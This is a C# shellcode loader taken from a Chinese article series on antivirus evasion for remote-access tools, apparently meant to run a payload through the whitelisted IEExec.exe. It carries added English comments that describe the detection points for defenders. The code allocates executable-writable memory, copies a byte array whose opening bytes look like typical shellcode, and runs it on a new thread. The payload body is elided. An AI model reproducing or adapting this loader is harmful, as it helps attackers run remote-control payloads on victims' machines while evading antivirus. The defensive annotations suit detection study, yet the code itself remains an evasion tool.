远控免杀专题(46)-白名单IEexec.exe执行payload(VT免杀率25-69)
2010 年 11 月 10 日
using System;
using System.Runtime.InteropServices;

namespace testIEexec
{
    // In-memory loader as published on the page: copies a byte array into a freshly
    // allocated RWX region and runs it on a new thread. For defenders, the call sequence
    // in Main — VirtualAlloc(PAGE_EXECUTE_READWRITE) -> Marshal.Copy -> CreateThread with
    // that region as start address -> WaitForSingleObject -> VirtualFree — is the canonical
    // "shellcode runner" shape that memory-scanning and ETW/EDR rules key on: an executable,
    // writable allocation not backed by any image, whose address then becomes a thread start
    // address. Per the article title the assembly is meant to be launched through IEExec.exe;
    // nothing in this listing references that host, so the loader body itself is host-independent.
    class Program
    {
        // Win32 constants for the allocate/free calls below. PAGE_EXECUTE_READWRITE (0x40)
        // is the single strongest static indicator in this file.
        private static UInt32 MEM_COMMIT = 0x1000;
        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
        private static UInt32 MEM_RELEASE = 0x8000;

        // Entry point: allocate, copy, run, wait, clean up.
        public static void Main(string[] args)
        {
            // Replace the contents of the array below. (translated from the original comment)
            // The array is declared as 894 bytes but the page elides the body ("....."), so
            // this snippet does not compile as shown; only the first ten bytes are visible.
            byte[] proc = new byte[894] { 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc8, 0x00, 0x00, 0x00,............. };

            // Commit an RWX region sized to the payload and copy the bytes into it.
            // This allocation + write is the first event a memory-protection hook would see.
            UInt32 funcAddr = VirtualAlloc(0, (UInt32)proc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            Marshal.Copy(proc, 0, (IntPtr)(funcAddr), proc.Length);

            IntPtr hThread = IntPtr.Zero;
            UInt32 threadId = 0;

            // Prepare data: an unmanaged PROCESSOR_INFO buffer is handed to the thread as its
            // parameter. The struct and the read-back further down appear to be leftovers from
            // a CPUID P/Invoke sample — nothing in this listing shows the payload using it, and
            // the decoded value is never read after the call.
            PROCESSOR_INFO info = new PROCESSOR_INFO();
            IntPtr pinfo = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(PROCESSOR_INFO)));
            Marshal.StructureToPtr(info, pinfo, false);

            // Execute native code: new thread whose start address is the RWX buffer (not
            // backed by a loaded module), then block until it exits. Thread-start-in-unbacked-
            // memory is the second detection point.
            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
            WaitForSingleObject(hThread, 0xFFFFFFFF);

            // Retrieve data (result unused), then tear down: free the parameter buffer,
            // close the thread handle, release the executable region.
            info = (PROCESSOR_INFO)Marshal.PtrToStructure(pinfo, typeof(PROCESSOR_INFO));
            Marshal.FreeHGlobal(pinfo);
            CloseHandle(hThread);
            VirtualFree((IntPtr)funcAddr, 0, MEM_RELEASE);
        }

        // kernel32 imports used by Main.
        [DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
        [DllImport("kernel32")]
        private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, UInt32 dwFreeType);
        [DllImport("kernel32")]
        private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);
        [DllImport("kernel32")]
        private static extern bool CloseHandle(IntPtr handle);
        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

        // Declared but not called anywhere in this listing (likely carried over from the
        // sample this loader was adapted from).
        [DllImport("kernel32")]
        private static extern IntPtr GetModuleHandle(string moduleName);
        [DllImport("kernel32")]
        private static extern UInt32 GetProcAddress(IntPtr hModule, string procName);
        [DllImport("kernel32")]
        private static extern UInt32 LoadLibrary(string lpFileName);
        [DllImport("kernel32")]
        private static extern UInt32 GetLastError();

        // Thread-parameter struct. Field names (dwMax, id0..id2, dwStandard, dwFeature, dwExt)
        // match a CPUID result layout; it is populated with zeros and never consumed here.
        [StructLayout(LayoutKind.Sequential)]
        internal struct PROCESSOR_INFO
        {
            public UInt32 dwMax;
            public UInt32 id0;
            public UInt32 id1;
            public UInt32 id2;
            public UInt32 dwStandard;
            public UInt32 dwFeature;
            // if AMD (original comment): extended feature word
            public UInt32 dwExt;
        }
    }
}